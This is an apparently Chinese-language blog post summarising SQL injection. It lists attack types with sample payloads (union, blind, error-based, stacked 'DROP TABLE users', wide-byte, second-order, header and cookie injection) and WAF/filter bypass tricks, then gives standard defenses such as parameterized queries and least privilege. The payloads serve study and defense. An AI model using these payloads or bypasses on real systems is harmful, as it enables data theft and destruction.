sql注入

已于 2024-07-06 14:47:11 修改
阅读量377 收藏 8
点赞数 6
分类专栏: 网络安全 文章标签: 网络安全
于 2024-07-05 18:06:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whateb/article/details/140214064
版权

原则上是对数据库进行操作,从而获取敏感信息,进行敏感操作。

1 攻击类型

1.1 联合查询

通过union联合查询所需内容

SELECT id, name FROM users WHERE id = 1 UNION SELECT 1, 'admin'-- ;

1.2 盲注

布尔盲注(看页面是否回显正常内容):

SELECT id, name FROM users WHERE id = 1 AND 1=1-- ; -- 这将返回结果

SELECT id, name FROM users WHERE id = 1 AND 1=2-- ; -- 这将不返回结果

布尔盲注(看页面的响应时间):

SELECT id, name FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0)-- ; -- 这将延迟5秒

1.3 报错注入(页面有报错信息)

extractvalue

SELECT extractvalue(1, CONCAT(0x3a, (SELECT database()), 0x3a));

floor

SELECT COUNT(*), CONCAT((SELECT database()), FLOOR(RAND(0)*2)) FROM INFORMATION_SCHEMA.TABLES GROUP BY FLOOR(RAND(0)*2);

updatexml

SELECT updatexml(1, CONCAT(0x3a, (SELECT database()), 0x3a), 1);

1.4 堆叠注入

SELECT id, name FROM users WHERE id = 1; DROP TABLE users-- ;

1.5 宽字节注入

SELECT id, name FROM users WHERE id = 1 AND name = 'admin' %df' -- ;

1.6 二次注入

第一次:

INSERT INTO users (username) VALUES ('admin'); DROP TABLE users--');

第二次:

SELECT * FROM users WHERE username = 'admin'; DROP TABLE users-- ';

1.7 User-Agent注入

User-Agent: ' UNION SELECT 1, @@version-- ;

1.8 Cookie注入

Cookie: session=' OR 1=1-- ;

2 绕过手法

2.1 双写、大小写

UNION写成uNiOnUUNNIONION

2.2 空格 and or 逗号

空格使用%20url编码,%09tab水平制表符,%0btab垂直制表符,%0a下一行,%0c新一页,%a0空,/**/,/*!/(使用注释和不注释也可以代替空格)

and:&&

or:||

逗号:substr,mid,join,like,limit,limit offset

2.3 大于、小于、等于

等于被过滤时,可以使用!(a<>b)进行绕过,也可以使用in绕过,greatest,least函数求出最大最小值与前面的绕过方式结合,

2.4 引号

宽字节注入,编码,转义字符\,二次注入

2.5 常见函数被过滤,使用不常见函数

例如,用CHAR()函数代替直接输入字符。benchmark()代替sleep(),left(),right()代替substr()

2.6 多重编码

使用URL编码、Base64编码等。

2.8 多参数拆分

使用注释

2.9 无列名注入

使用information_schema

使用sys.schema_auto_increment_columns查询到表名后,使用join内联爆出列名,然后使用using写入爆出来的列名,达到获取所有列名

3 防御措施

3.1 参数化查询和预编译语句

使用?代替参数

3.2 使用数据库的存储过程

通过参数传递数据,减少直接编写sql查询的机会

3.3 输入验证和清理

对用户输入进行严格的验证和清理,确保输入符合预期格式

使用正则表达式,严格检查输入,需要提前定义

3.4 最小权限原则

为应用程序使用的数据库账户授予最低权限,确保即使发生sql注入,攻击者也无法进行破坏性操作

3.5 数据库错误处理

避免将数据库的错误信息直接暴露给用户,防止攻击者通过错误信息判断或推断数据库的结构

当语句发生错误时,不将错误信息展示在页面中,精心制作错误信息,使用try except

例如:An error occurred

3.6 使用ORM(对象关系映射)

通过高级抽象层,减少直接编写sql查询的需求,降低注入风险

java中有mybatis-plus,其它语言中也有类似的框架

3.7 启用数据库的安全功能

许多数据库提供了内置的安全功能

在 MySQL 中启用 NO_BACKSLASH_ESCAPES 模式

SET sql_mode = 'NO_BACKSLASH_ESCAPES';

3.8 使用WAF和IDS

松鼠། – _ – །
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入(SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
细说——SQL注入
LainWith的博客
10-09 7781
目录SQL是什么?什么是SQL注入漏洞原理漏洞原因为什么会有SQL注入注⼊点可能存在的位置漏洞危害提交方法判断注入点判断字符型还是数字型sql注入绕过获取网站路径SQL 注入读写文件1. 数据库支持文件读写2. 当前用户具有文件权限3. 知道文件绝对路径查询方式及报错盲注⭐查询方式报错盲注报错注入函数二次注入原理实施步骤举例堆叠查询DNSlog脑图常见数据库,及注入相关⭐注释符、数据库端口数据库文件后缀名特有的数据库查看当前用户或权限ASCII转换函数不同数据库注入结果的区别⭐Sql注入中连接字符串常用函数
SQL注入攻击与防护
weixin_62707591的博客
06-21 5746
攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,并且插入的恶意SQL命令会导致原有SQL语句作用发生改变,从而得到欺骗服务器执行恶意SQL命令的一种攻击方式。① 概述开源的自动化SQL注入工具,由Python写成② 主要功能扫描、发现、利用给定URL的SQL注入漏洞③ 特点。
Go语言Gin框架安全加固:全面解析SQL注入、XSS与CSRF的解决方案
热门推荐
qq_35716689的博客
02-04 27万+
在使用 Gin 框架处理前端请求数据时,必须关注安全性问题,以防范常见的攻击。作者: 鼠鼠我捏,要死了捏
Sql注入
m0_60715541的博客
12-04 2175
Sql注入是通过拼接sql查询语句,使Sql查询的时候发生歧义,导致攻击者可以查询数据库的全部信息​ 攻击对象是数据库。存在威胁:SQL注入漏洞对于数据安全的影响: sql注入防范 解决SQL注入问题的关键是对所有可能来自用户输入的数据进行严格的检查、对数据库配置使用最小权限原则。通常修复使用的方案有:代码层面: ​ 没有进行PDO预处理的SQL,在输入SQL语句进行执行的时候,web服务器自己拼凑SQL的时候有可能会把危险的SQL语句拼凑进去。但如果进行了PDO预处理的SQL,会让MYSQL自己
sql注入基础原理(超详细)
会哭的雨@的博客
05-17 13万+
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Busi...
SQL注入攻击介绍
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8340
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
webgoat-server-8.2.2.zip
07-21
解压即可得到webgoat-server-8.2.2.jar
人工智能行业深度报告:WAIC2024,国产AI+应用“百花齐放”
最新发布
07-21
2024年世界人工智能大会(WAIC 2024)上,国产AI+应用生态呈现“百花齐放”的局面 1. WAIC 2024:国产 AI+应用生态“百花齐放” 多家厂商携大模型及AI应用成果亮相展会,涵盖金山办公、科大讯飞、华为、商汤等知名企业。 OpenAI 禁令加速推动国产 AI 生态,国产大模型性能持续提升,缩小与海外差距。 预计未来国产 AI+行业应用将迎来“百花齐放”局面,商业空间加速打开。 2. 国产大模型加速迭代,代表性厂商生态加速构建 科大讯飞 发布星火 V4.0 大模型,全面对标 GPT-4 Turbo,多模态能力显著提升。 星火医疗和教育垂类模型能力升级,赋能行业应用落地。 推出星火企业智能平台,赋能企业构建岗位专属助手。 华为 发布盘古大模型 5.0 系列,包括不同参数规模,适用于多种场景。 推出盘古具身智能大模型,推动人形机器人技术升级。 盘古 5.0 赋能华为小艺升级,在多个行业落地应用。 商汤 发布“日日新 5.5”模型,交互体验对标 GPT-4o,多模态能力实现突破。 推出面向 C 端用户的可控人物视频生成模型 Vimi。 率先实现原生多模态大模型车端部署
java毕设&课设-基于web的实验室管理系统(自动排课功能的实现).zip
07-21
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
丽珠集团000513.SZ公司首次覆盖报告:创新药与高壁垒制剂齐推进,多元化布局促发展.pdf
07-21
丽珠集团000513.SZ公司首次覆盖报告:创新药与高壁垒制剂齐推进,多元化布局促发展
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQL、SQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值